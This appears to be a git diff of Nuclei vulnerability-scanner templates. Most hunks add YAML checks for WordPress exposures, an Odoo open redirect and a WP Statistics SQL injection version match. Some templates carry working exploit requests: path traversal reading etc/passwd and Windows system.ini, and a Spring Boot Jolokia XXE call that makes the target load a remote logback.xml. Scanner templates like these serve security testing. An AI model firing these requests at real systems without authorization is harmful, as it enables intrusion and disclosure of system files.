|
- '"filePath":'
|
||||||
|
- '"list":'
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: interlib-fileread
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Interlib Fileread
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||||
|
tags: interlib,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd"
|
||||||
|
- "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
- "for 16-bit app support"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: kafdrop,xss
|
tags: kafdrop,xss
|
||||||
|
description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server.
|
||||||
reference: https://github.com/HomeAdvisor/Kafdrop/issues/12
|
reference: https://github.com/HomeAdvisor/Kafdrop/issues/12
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: nsasg-arbitrary-file-read
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NS ASG Arbitrary File Read
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
tags: nsasg,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,20 @@
|
||||||
|
id: odoo-cms-redirect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Odoo CMS - Open redirection all Version
|
||||||
|
author: 0x_Akoko
|
||||||
|
description: Odoo CMS - Open redirection all Version.
|
||||||
|
reference: https://cxsecurity.com/issue/WLB-2021020143
|
||||||
|
severity: low
|
||||||
|
tags: odoo,redirect
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||||
|
part: header
|
|
@ -2,7 +2,7 @@ id: springboot-actuators-jolokia-xxe
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Spring Boot Actuators (Jolokia) XXE
|
name: Spring Boot Actuators (Jolokia) XXE
|
||||||
author: dwisiswant0
|
author: dwisiswant0 & ipanda
|
||||||
severity: high
|
severity: high
|
||||||
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
|
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
|
||||||
reference: |
|
reference: |
|
||||||
|
@ -14,6 +14,8 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
|
- "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
|
||||||
|
- "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: wordpress-db-repair
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress DB Repair Exposed
|
||||||
|
author: _C0wb0y_
|
||||||
|
severity: low
|
||||||
|
description: Discover enabled Wordpress repair page.
|
||||||
|
tags: wordpress,config,fpd
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/maint/repair.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>WordPress"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "define('WP_ALLOW_REPAIR', true);"
|
||||||
|
negative: true
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: wp-mailchimp-log-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Mailchimp 4 Debug Log Exposure
|
||||||
|
author: aashiq
|
||||||
|
severity: medium
|
||||||
|
description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content
|
||||||
|
tags: logs,wordpress,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "WARNING: Form"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'text/plain'
|
||||||
|
part: header
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: wp-plugin-statistics-sqli
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
|
||||||
|
author: lotusdll
|
||||||
|
severity: critical
|
||||||
|
description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/49894
|
||||||
|
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
|
||||||
|
- https://github.com/Udyz/WP-Statistics-BlindSQL
|
||||||
|
tags: wordpress,wp-plugin,unauth,sqli,blind
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "WP Statistics"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$'
|
||||||
|
part: body
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: wordpress-popup-listing
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Popup Plugin Directory Listing
|
||||||
|
author: aashiq
|
||||||
|
severity: info
|
||||||
|
description: Searches for sensitive directories present in the wordpress-popup plugin.
|
||||||
|
tags: wordpress,listing
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Index of"
|
||||||
|
- "/wp-content/plugins/wordpress-popup/views/admin"
|
||||||
|
condition: and
|
|
@ -1,32 +0,0 @@
|
||||||
id: wp-uploads-listing
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: WordPress Upload Directory Listing Enable
|
|
||||||
author: yashgoti
|
|
||||||
severity: info
|
|
||||||
tags: wordpress
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/2015/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/2016/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/2017/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/2018/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/2019/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/2020/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/2021/"
|
|
||||||
- "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "Directory listing for"
|
|
||||||
- "Index of /"
|
|
||||||
- "[To Parent Directory]"
|
|
||||||
- "Directory: /"
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
|
@ -0,0 +1,18 @@
|
||||||
|
id: airflow-workflow
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Airflow Security Checks
|
||||||
|
author: pdteam
|
||||||
|
description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target.
|
||||||
|
tags: workflow
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
|
||||||
|
- template: technologies/airflow-detect.yaml
|
||||||
|
subtemplates:
|
||||||
|
- template: cves/2020/CVE-2020-11978.yaml
|
||||||
|
- template: cves/2020/CVE-2020-13927.yaml
|
||||||
|
- template: exposed-panels/airflow-panel.yaml
|
||||||
|
- template: exposures/configs/airflow-configuration-exposure.yaml
|
||||||
|
- template: default-logins/apache/airflow-default-credentials.yaml
|
||||||
|
- template: misconfiguration/airflow/
|
|
@ -6,9 +6,9 @@ info:
|
||||||
description: A simple workflow that runs all Ruijie related nuclei templates on a given target.
|
description: A simple workflow that runs all Ruijie related nuclei templates on a given target.
|
||||||
|
|
||||||
workflows:
|
workflows:
|
||||||
- template: default-logins/smartweb/ruijie-smartweb-default-password.yaml
|
- template: cnvd/CNVD-2021-17369.yaml
|
||||||
- template: vulnerabilities/other/ruijie-networks-lfi.yaml
|
- template: vulnerabilities/other/ruijie-networks-lfi.yaml
|
||||||
- template: vulnerabilities/other/ruijie-networks-rce.yaml
|
- template: vulnerabilities/other/ruijie-networks-rce.yaml
|
||||||
- template: exposures/configs/ruijie-information-disclosure.yaml
|
- template: exposures/configs/ruijie-information-disclosure.yaml
|
||||||
- template: exposures/configs/ruijie-smartweb-disclosure.yaml
|
- template: cnvd/CNVD-2020-56167.yaml
|
||||||
- template: exposures/configs/ruijie-phpinfo.yaml
|
- template: exposures/configs/ruijie-phpinfo.yaml
|
||||||
|
|
|
@ -32,4 +32,5 @@ workflows:
|
||||||
- template: cves/2020/CVE-2020-35489.yaml
|
- template: cves/2020/CVE-2020-35489.yaml
|
||||||
- template: cves/2021/CVE-2021-24146.yaml
|
- template: cves/2021/CVE-2021-24146.yaml
|
||||||
- template: cves/2021/CVE-2021-24176.yaml
|
- template: cves/2021/CVE-2021-24176.yaml
|
||||||
|
- template: cves/2021/CVE-2021-24316.yaml
|
||||||
- template: vulnerabilities/wordpress/
|
- template: vulnerabilities/wordpress/
|
Loading…
Reference in New Issue